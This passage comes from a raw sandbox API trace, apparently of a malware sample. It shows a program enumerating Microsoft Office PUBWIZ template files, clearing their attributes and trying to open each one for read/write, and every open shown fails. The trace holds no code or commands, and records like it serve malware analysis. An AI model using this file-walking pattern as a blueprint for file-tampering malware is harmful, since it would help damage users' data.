dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.769] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.769] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML", dwFileAttributes=0x80) returned 0 [0137.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.769] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.769] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.770] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS11.POC", dwFileAttributes=0x80) returned 0 [0137.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.770] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.770] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.770] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS98.POC", dwFileAttributes=0x80) returned 0 [0137.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.771] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.771] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.771] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.771] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWSHM.POC", dwFileAttributes=0x80) returned 0 [0137.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWSHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\newshm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.772] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ORIG98.POC", dwFileAttributes=0x80) returned 0 [0137.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ORIG98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\orig98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.772] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.772] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.772] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.772] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICCAP98.POC", dwFileAttributes=0x80) returned 0 [0137.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICCAP98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\piccap98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.773] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.773] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICSTYLES.DPV", dwFileAttributes=0x80) returned 0 [0137.773] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICSTYLES.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\picstyles.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.773] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.773] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.773] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.773] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICTPH.POC", dwFileAttributes=0x80) returned 0 [0137.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PICTPH.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\pictph.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.774] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.774] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.774] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PNCTUATE.POC", dwFileAttributes=0x80) returned 0 [0137.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PNCTUATE.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\pnctuate.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.775] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.775] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.775] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POST98SP.POC", dwFileAttributes=0x80) returned 0 [0137.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POST98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\post98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.775] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.776] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.DPV", dwFileAttributes=0x80) returned 0 [0137.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.776] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.776] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.776] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML", dwFileAttributes=0x80) returned 0 [0137.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.777] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCD11.POC", dwFileAttributes=0x80) returned 0 [0137.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCD11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcd11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.777] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.777] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.777] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.777] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCD98.POC", dwFileAttributes=0x80) returned 0 [0137.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCD98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.778] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.778] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.778] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROG98.POC", dwFileAttributes=0x80) returned 0 [0137.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROG98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\prog98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.778] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.778] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.779] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.DPV", dwFileAttributes=0x80) returned 0 [0137.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.779] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.779] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.779] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.779] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML", dwFileAttributes=0x80) returned 0 [0137.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.780] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.780] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.780] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS10TARG.POC", dwFileAttributes=0x80) returned 0 [0137.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS10TARG.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ps10targ.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.780] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.780] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.780] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.780] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS2SWOOS.POC", dwFileAttributes=0x80) returned 0 [0137.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS2SWOOS.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ps2swoos.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.781] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.781] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.781] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.781] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS9CRNRH.POC", dwFileAttributes=0x80) returned 0 [0137.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PS9CRNRH.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ps9crnrh.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.781] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.781] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.781] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.782] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULLQUOTEBB.DPV", dwFileAttributes=0x80) returned 0 [0137.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULLQUOTEBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\pullquotebb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.782] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.782] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.783] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULLQUOTEBB.POC", dwFileAttributes=0x80) returned 0 [0137.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULLQUOTEBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\pullquotebb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.783] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.783] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.783] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.783] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.783] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULQOT98.POC", dwFileAttributes=0x80) returned 0 [0137.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PULQOT98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\pulqot98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.784] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.DPV", dwFileAttributes=0x80) returned 0 [0137.784] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.784] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.784] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.784] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML", dwFileAttributes=0x80) returned 0 [0137.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.785] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.785] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.785] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QUIKPUBS.POC", dwFileAttributes=0x80) returned 0 [0137.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QUIKPUBS.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\quikpubs.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.785] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.785] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.786] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.786] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\REPTWIZ.POC", dwFileAttributes=0x80) returned 0 [0137.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\REPTWIZ.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\reptwiz.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.786] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.786] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.786] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.786] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.786] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RES98.POC", dwFileAttributes=0x80) returned 0 [0137.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RES98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\res98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.787] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.787] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.787] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESP98.POC", dwFileAttributes=0x80) returned 0 [0137.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESP98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resp98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.787] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.787] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.787] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.787] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.DPV", dwFileAttributes=0x80) returned 0 [0137.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 